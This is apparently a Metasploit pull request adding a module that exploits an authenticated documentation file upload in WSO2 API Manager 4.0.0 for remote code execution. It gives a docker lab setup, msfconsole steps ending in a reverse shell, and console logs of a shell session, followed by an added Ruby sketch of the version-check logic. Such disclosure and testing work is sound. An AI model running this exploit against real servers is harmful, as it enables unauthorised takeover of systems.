rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

Added module for WSO2 API Manager Documentation File Upload Remote Co… #19647

Open heyder opened 1 week ago

heyder commented 1 week ago

Vulnerable Application

Closes #19646

A vulnerability in the 'Add API Documentation' feature allows malicious users with specific permissions (/permission/admin/login and /permission/admin/manage/api/publish) to upload arbitrary files to a user-controlled server location. This flaw could be exploited to execute remote code, enabling an attacker to gain control over the server.

docker-compose.yml:

```yaml
services:
  api-manager:
    image: wso2/wso2am:4.0.0-alpine
    container_name: swo2_api_manager
    ports:
      - "9443:9443"
```

```sh
docker-compose up
```

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use multi/http/wso2_api_manager_file_upload_rce
  4. Do: set rhosts [ip]
  5. Do: set lhost [ip]
  6. Do: run
  7. You should get a shell.

Scenarios

WSO2 API Manager 4.0.0

```
msf6 exploit(multi/http/wso2_api_manager_file_upload_rce) > exploit

[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target...
[+] Authentication successful
[+] The target appears to be vulnerable. Detected WSO2 API Manager 4.0.0 which is vulnerable.
[+] Authentication successful
[*] Listing APIs...
[+] Document created successfully
[*] Uploading payload...
[+] Payload uploaded successfully
[*] Executing payload...
[+] Payload executed successfully
[*] Command shell session 2 opened (127.0.0.1:4444 -> 127.0.0.1:58206) at 2024-11-03 15:36:37 +0100

id
uid=802(wso2carbon) gid=802(wso2) groups=802(wso2)
pwd
/home/wso2carbon/wso2am-4.0.0
exit
[*] 127.0.0.1 - Command shell session 2 closed.
```

Manually setting up the wrong API version

```
msf6 exploit(multi/http/wso2_api_manager_file_upload_rce) > exploit

[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target...
[+] Authentication successful
[-] Mismatch between version found (4.0.0) and module target version (WSO2 API Manager (4.2.0))
[+] The target appears to be vulnerable. Detected WSO2 API Manager 4.0.0 which is vulnerable.
[*] Listing products APIs...
[-] Exploit aborted due to failure: unexpected-reply: Failed to list APIs
[*] Exploit completed, but no session was created.
```
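The two transcripts above show the behaviour worth understanding before running this module against anything real: the automatic check reports "appears to be vulnerable" from the detected version alone, a mismatch between that version and the selected target is only a warning, and the run then fails later because the version-specific API calls (listing APIs) are made against the wrong target's endpoints. The Ruby below is an added example that models that decision logic; it is not the module's code from this PR, and it assumes a constructed response body, a regex for pulling the version out of it, a target list limited to the two target names visible in the transcripts, and a vulnerable range bounded by those same versions (the PR itself only confirms 4.0.0):

```ruby
# Added example, not part of the PR's module: models the auto-check and
# target-selection logic seen in the console output, using Gem::Version
# from Ruby's standard library for version comparison.
require 'rubygems'

# Target names as printed in the transcript; the module's full list is an assumption.
TARGETS = ['WSO2 API Manager (4.0.0)', 'WSO2 API Manager (4.2.0)'].freeze

# Range treated as vulnerable. Assumption: the PR only demonstrates 4.0.0, and
# 4.2.0 is included because the module offers it as a target.
VULNERABLE = (Gem::Version.new('4.0.0')..Gem::Version.new('4.2.0'))

# Extracts "x.y.z" from a response body. The real module's detection source is
# not shown in the PR, so this pattern is a constructed stand-in.
def extract_version(body)
  m = body.match(/WSO2 API Manager\s+v?(\d+\.\d+\.\d+)/i)
  m && Gem::Version.new(m[1])
end

# Version embedded in a target name such as "WSO2 API Manager (4.2.0)".
def target_version(target_name)
  Gem::Version.new(target_name[/\d+\.\d+\.\d+/])
end

# Mirrors the auto-check: a mismatch with the selected target produces a
# warning only; the check result depends solely on the detected version
# falling inside VULNERABLE. Returns a Hash so callers can inspect it.
def check(body, selected_target)
  detected = extract_version(body)
  if detected.nil?
    return { code: :unknown, detected: nil, mismatch: false,
             messages: ['Could not detect the WSO2 API Manager version'] }
  end

  messages = []
  mismatch = detected != target_version(selected_target)
  if mismatch
    messages << "Mismatch between version found (#{detected}) and module target version (#{selected_target})"
  end

  if VULNERABLE.cover?(detected)
    code = :appears
    messages << "Detected WSO2 API Manager #{detected} which is vulnerable."
  else
    code = :safe
    messages << "Detected WSO2 API Manager #{detected} which is not vulnerable."
  end

  { code: code, detected: detected.to_s, mismatch: mismatch, messages: messages }
end

# Chooses the target whose version equals the detected one, so that the
# version-specific requests (such as listing APIs) go to the right endpoints.
# Returns nil when nothing matches; a caller should abort rather than guess.
def matching_target(body)
  detected = extract_version(body)
  return nil if detected.nil?

  TARGETS.find { |t| target_version(t) == detected }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample body; not a real WSO2 response.
  sample = '<title>WSO2 API Manager 4.0.0 - Publisher</title>'
  result = check(sample, 'WSO2 API Manager (4.2.0)')
  result[:messages].each { |m| puts "[#{m.start_with?('Mismatch') ? '-' : '+'}] #{m}" }
  puts "Use target: #{matching_target(sample) || 'none (abort)'}"
end
```

Run against the sample body with the 4.2.0 target selected, this reproduces the second transcript's shape: a mismatch warning followed by an "appears vulnerable" verdict. The practical rule it encodes is to let `matching_target` (or the module's automatic targeting) pick the target from the detected version instead of setting it by hand.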